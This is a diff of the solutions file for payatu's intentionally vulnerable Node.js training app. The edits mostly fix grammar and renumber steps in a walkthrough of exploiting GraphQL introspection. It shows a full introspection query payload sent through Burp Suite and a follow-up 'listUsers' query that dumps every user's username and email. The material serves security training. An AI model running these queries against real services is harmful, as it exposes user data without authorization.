payatu/vuln-nodejs-app/solutions/solutions.md

 ### Exploit

-If an application is using graphql and introspection query is not disabled we can find out all the query and see if any query is available that can leak sensitive information.
+If an application is using graphql and the introspection query is not disabled we can find out all the queries and see if any query is available that can leak sensitive information.

-1. Go to graphql endpoint `graphql`
+1. Go to graphql endpoint `/graphql`.
-2. Refresh the page while intercepting request using burpsuite transfer the request to repeater change the request method to POST and content-type to `application/json` and use the following introspection query in the body.
+2. Refresh the page while intercepting request using burp suite transfer the request to repeater change the request method to POST and content-type to `application/json` and use the following introspection query in the body.

 ```json
 {"query": "query IntrospectionQuery {__schema {queryType { name }         mutationType { name } subscriptionType { name } types {...FullType}directives {name description locations args { ...InputValue } } } } fragment FullType on __Type { kind name description fields(includeDeprecated: true) { name         description args { ...InputValue } type { ...TypeRef } isDeprecated         deprecationReason } inputFields { ...InputValue } interfaces { ...TypeRef }       enumValues(includeDeprecated: true) { name description isDeprecated deprecationReason } possibleTypes { ...TypeRef } } fragment InputValue on __InputValue { name description type { ...TypeRef } defaultValue } fragment TypeRef on __Type { kind name ofType { kind name ofType { kind name           ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name } } } } } } } }"}
 ```

-1. Copy the respose and go to `https://apis.guru/graphql-voyager/` website click on change schema button switch to introspection tab and paste the introspection query response click on display and you will have a complete query map.
+3. Copy the response and go to `https://apis.guru/graphql-voyager/` website click on the change schema button switch to the introspection tab and paste the introspection query response click on display and you will have a complete query map.

-2. In Query type you will see a `listUsers` query that returns a list of users, we will use this query to list all the users registered in the application.
+4. In Query type you will see a `listUsers` query that returns a list of users, we will use this query to list all the users registered in the application.

-3. Go back to burp repeater tab and replace the introspection query with the following query, click on go and you will get username & email of all registered users.
+5. Go back to the burp repeater tab and replace the introspection query with the following query, click on go and you will get the username & email of all registered users.

 ```json
 {"query": "query {listUsers{username email}}"}